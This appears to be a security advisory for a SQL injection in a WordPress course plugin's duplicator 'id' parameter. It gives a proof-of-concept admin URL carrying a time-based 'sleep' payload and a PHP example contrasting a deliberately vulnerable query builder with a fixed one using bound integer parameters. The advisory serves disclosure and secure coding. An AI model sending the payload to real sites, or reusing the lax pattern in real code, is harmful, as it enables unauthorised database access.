The plugin does not sanitise, validate and escape the id parameter before using it in SQL statements when duplicating a course/lesson/quiz/question, leading to SQL injection issues.
The id needs to start with a valid course/lesson/quiz/question ID: https://examle.com/wp-admin/edit.php?post_type=lp_course&lp-ajax=duplicator&id=149%20and%20sleep(1)%23
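The pattern behind this class of bug and its fix, as an added example that is not the plugin's code: it assumes the "must start with a valid ID" condition comes from an existence check that casts the value to an integer while the raw string is what reaches the SQL text. The `posts` table, function names and SQLite backend are hypothetical stand-ins.

```php
<?php
// Added illustration; table, column and function names are hypothetical,
// not taken from the plugin's source.

// Constructed sample data: an in-memory table standing in for the posts table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (ID INTEGER PRIMARY KEY, post_type TEXT)');
$db->exec("INSERT INTO posts (ID, post_type) VALUES (149, 'lp_course')");

// Lax pattern (assumed): the existence check casts to int, so a string that
// merely starts with a valid ID passes, and the raw string is concatenated.
// The statement is only built here, never executed.
function build_query_lax(PDO $db, string $id): ?string {
    $check = $db->prepare('SELECT 1 FROM posts WHERE ID = ?');
    $check->execute([(int) $id]);   // leading digits are kept, the rest is dropped
    if ($check->fetchColumn() === false) {
        return null;
    }
    return "SELECT * FROM posts WHERE ID = $id";   // request text reaches the SQL
}

// Hardened pattern: accept only a whole positive integer, then bind it as one.
function find_post_strict(PDO $db, string $id): ?array {
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return null;                // trailing text after the digits is rejected
    }
    $stmt = $db->prepare('SELECT ID, post_type FROM posts WHERE ID = :id');
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The id value from the proof-of-concept URL above, URL-decoded.
$from_url = rawurldecode('149%20and%20sleep(1)%23');

var_dump(build_query_lax($db, $from_url));   // passes the check; the text is in the query
var_dump(find_post_strict($db, $from_url));  // rejected before any SQL is built
var_dump(find_post_strict($db, '149'));      // a plain ID still resolves
```

In WordPress code the equivalent is to pass the value through `absint()` and build the statement with `$wpdb->prepare()` and a `%d` placeholder, using the sanitised integer everywhere afterwards rather than the original request value.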
JrXnm
JrXnm
Yes
2021-11-09 (about 9 months ago)
2021-11-09 (about 9 months ago)
2022-04-11 (about 4 months ago)